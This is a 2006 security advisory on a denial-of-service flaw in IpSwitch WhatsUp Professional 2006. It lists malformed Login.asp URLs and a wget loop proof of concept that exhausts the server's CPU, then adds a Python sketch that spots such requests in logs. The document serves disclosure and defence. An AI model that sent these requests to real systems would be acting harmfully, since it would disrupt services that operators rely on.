Date: Wed Feb 22 16:54:20 2006
From: jzlatin at ramat.cc (Josh Zlatin)
Subject: IpSwitch WhatsUp Professional 2006 DoS

Synopsis: IPSwitch WhatsUp Professional 2006 DoS Flaw
Product: IPSwitch WhatsUp
         http://www.ipswitch.com
Version: Confirmed on WhatsUp Professional 2006
Author: Josh Zlatin-Amishav
Date: February 22, 2006

Background:
WhatsUp Professional 2006 is application and network management that keeps
your critical business technology, like email servers and databases, working
efficiently so you can run your business.

Issue:
The NmService.exe executable does not handle certain requests properly.
The following URLs can be used to create a DoS condition due to the
NmService using 100% CPU.

http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&btnLogIn=[Log&In]=&sLoginUserName=
http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&btnLogIn=[Log&In]=&sLoginPassword=
http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&In]=&btnLogIn=
http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&btnLogIn=[Log&In]=

PoC:
    while [ 1 ]; do wget -O /dev/null http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&btnLogIn=[Log&In]=&sLoginUserName=; done

References:
http://www.ipswitch.com
http://zur.homelinux.com/Advisories/ipswitch_dos.txt
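All four URLs in the advisory share one observable trait: the unescaped `&` inside `[Log&In]` leaves the query string carrying a parameter named `In]`. The following detection sketch is an added example, not part of the original advisory or any vendor tooling; the log line format, the sample lines, the repeat threshold and the assumption that the four parameter names in the advisory are the only legitimate Login.asp fields are all constructed for illustration.

```python
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Parameter names seen in the advisory's URLs; treating them as the complete
# set of legitimate Login.asp fields is an assumption of this example.
EXPECTED = {"bIsJavaScriptDisabled", "sLoginUserName", "sLoginPassword", "btnLogIn"}
LOGIN_PATH = "/nmconsole/login.asp"

# Constructed sample lines (client IP, method, request target); not real logs.
SAMPLE_LOG = """\
192.0.2.10 GET /NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=admin&sLoginPassword=x&btnLogIn=Log+In
198.51.100.7 GET /NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&btnLogIn=[Log&In]=&sLoginUserName=
198.51.100.7 GET /NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&In]=&btnLogIn=
198.51.100.7 GET /NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&btnLogIn=[Log&In]=
192.0.2.10 GET /NmConsole/Default.asp?view=map
"""

def unexpected_keys(target):
    """Return query keys on a Login.asp request that are not in EXPECTED."""
    parts = urlsplit(target)
    if parts.path.lower() != LOGIN_PATH:
        return []
    # keep_blank_values: the advisory's parameters are all empty-valued.
    keys = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    return sorted(set(keys) - EXPECTED)

def scan(log_text, threshold=3):
    """Return (per-line findings, clients with >= threshold malformed requests)."""
    findings, per_client = [], Counter()
    for lineno, line in enumerate(log_text.splitlines(), 1):
        fields = line.split(None, 2)
        if len(fields) != 3:
            continue  # skip lines that do not match the constructed format
        client, _method, target = fields
        extra = unexpected_keys(target)
        if extra:
            findings.append((lineno, client, extra))
            per_client[client] += 1
    repeat = sorted(c for c, n in per_client.items() if n >= threshold)
    return findings, repeat

if __name__ == "__main__":
    hits, repeat = scan(SAMPLE_LOG)
    for lineno, client, extra in hits:
        print(f"line {lineno}: {client} sent unexpected parameter(s) {extra}")
    print("repeat sources:", repeat)
```

The same key check can sit in a reverse proxy or WAF rule in front of port 81 so that requests carrying unknown parameter names never reach NmService.exe.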